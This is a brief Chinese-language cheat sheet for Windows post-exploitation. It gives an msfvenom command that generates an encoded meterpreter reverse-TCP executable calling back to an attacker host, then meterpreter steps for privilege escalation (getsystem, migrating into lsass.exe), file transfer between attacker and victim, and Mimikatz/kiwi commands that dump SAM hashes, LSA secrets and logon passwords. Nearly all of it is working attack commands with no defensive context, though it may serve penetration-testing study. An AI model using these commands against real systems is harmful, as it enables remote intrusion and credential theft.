產 Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={PORT} -f exe -e x86/shikata_ga_nai > {FILE}
執行
- 記得 Payload 需要修改成相對應的
windows/meterpreter/reverse_tcp
常見指令
ls
,pwd
, mkdir
, cat
getuid
- 取得使用者名稱
edit {檔名}
sysinfo
getsystem
- 如果有過 UAC 的話,有機率可以直接拿 system
- 執行後輸入
getuid
就可以確認自己是否真的是 system 了
ps
migrate {PID}
- 可以讓自己爬到 x64 之類的 system 權限上
- 例如 lsass.exe 的 PID
screenshot
upload {檔案}
/ download {檔案}
- upload -> attacker to victim
- download -> victim to attacker
Mimikatz
- 需要是 system 權限
load kiwi
help kiwi
lsa_dump_sam
lsa_dump_secrets
kiwi_cmd sekurlsa::logonpasswords